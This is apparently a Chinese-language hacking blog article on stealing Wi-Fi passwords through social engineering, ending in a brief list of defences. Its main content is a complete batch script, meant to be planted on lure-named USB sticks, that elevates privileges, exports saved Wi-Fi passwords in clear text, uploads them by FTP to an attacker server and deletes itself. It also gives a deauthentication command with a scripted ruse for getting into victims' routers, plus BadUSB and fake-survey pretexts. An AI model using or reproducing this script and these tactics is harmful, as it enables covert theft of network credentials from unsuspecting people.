何為社工?社工是一種通過利用受害者心理弱點,如本能反應、好奇心、同情心、信任、貪婪等進行諸如欺騙、盜取、控制等非法手段的一種攻擊方式。在無線安全中也可以利用社工做到許多非法操作。下面舉幾個利用社工盜取wpa2密碼的例子:
0×01 移動存儲攻擊
某寶小容量u盤,在u盤中存放一個bat批處理文件,并命名為誘使人點開的標題,如:windows電腦優化、私人照片等等。其實bat文件的內容是這個:
@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' NEQ '0' (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
exit /B
:gotAdmin
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
md c:\win
netsh wlan export profile key=clear folder=c:\win
echo open 服務器ip>C:\config.txt
echo user 賬號>>C:\config.txt
echo 密碼>>C:\config.txt
echo mput c:\win\*.xml>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo bye>>C:\config.txt
ftp -n -s:"C:\config.txt"
del C:\config.txt
del C:\win\*.xml
del %0
這個bat腳本會讀取本機連接過的wifi信息(包括密碼)打包到一個文件夾里并全部put到服務器上,然后刪除痕跡和自身防止服務器信息泄露。最后攻擊者就可以在自己的ftp服務器里挑選自己中意的wifi了。
攻擊演示:
打開此腳本

彈出cmd界面,1秒后消失(太快了不好截),bat腳本也隨之消失
查看ftp服務器

wifi信息已經put上來了
進入服務器打開一個xml文件

就拿到了密碼
可以自己在里面添加功能使社工效果更好,例如腳本名稱命名為某某公司有獎問卷調查,并添加打開調查問卷的命令,使攻擊神不知鬼不覺。
若攻擊者將腳本拷入多個U盤后廣泛撒網,就可以獲得該城市的大量wifi信息,影響極大。
0×02 直接接觸受害者
1.使用Deauthentication攻擊
aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
在下班休息的時候(這個時候普遍在使用網絡)對受害者使用斷網攻擊,等一小時后去敲門,詢問網絡是否故障,詢問網絡是哪家公司配置的,然后聲稱自己的網絡也故障了,是一樣的公司,然后詢問報修電話并撥打,其實撥打的是其他人或根本沒有撥打,然后假裝是保修人員提示讓自己重啟路由器,攻擊者就可以接觸到受害者路由器,運氣好的話路由器背面有pin碼,就可以撤退了。如果沒有,攻擊者就進一步施壓,假裝被保修人員提示打開路由器管理界面在管理界面重啟路由器,乘機看到密碼。重啟完畢后手機ssh連接kali停止攻擊,造成重啟成功修復網絡的假象,然后撤退。2.結合移動存儲攻擊,配合badusb,謊稱有重要文件需要發送然而手機沒電了,家里人還沒下班。第一天進公司不想留下壞印象,從而直接接觸受害者電腦,插入badusb,執行bat腳本或木馬
3.謊稱自己是某某公司或某某大學的,正在進行網民安全意識的問卷調查,并將其中帶有提問wifi密碼的問卷遞交受害者,從而獲得wifi密碼
0×03 wifi釣魚
利用fluxion、wifiphisher等工具實施釣魚攻擊:
https://github.com/FluxionNetwork/fluxion
https://github.com/sophron/wifiphisher ——項目地址
它們的大概原理是抓取受害者客戶端與wifi的握手包,對目標客戶端實施wifi拒絕服務攻擊,發送大量解離包,然后偽造一個相同名稱的ap,受害者連接偽造的ap后會被解析到這個頁面:

受害者輸入密碼后會自動與抓取的握手包進行比對,若正確,則停止拒絕服務攻擊。網上有很多wifi釣魚的教程,這里就不再闡述。
0×04 防御措施
1.綁定mac地址,設置白名單,只允許自己的機器連接wifi
2.隱藏wifi廣播,避免自己成為目標
3.不要插入來路不明的u盤,不要打開來路不明的程序,不要連接來路不明的無線信號
4.盡量不讓陌生人接觸到自己的設備
5.wifi最好使用wpa2加密,并使密碼復雜度越高越好,盡量別在密碼里使用和自己有關的信息
6.定期更換路由器管理界面密碼和wifi密碼
7.最好關閉路由器上的wps功能
8.盡量不使用wifi萬能鑰匙等類似軟件
|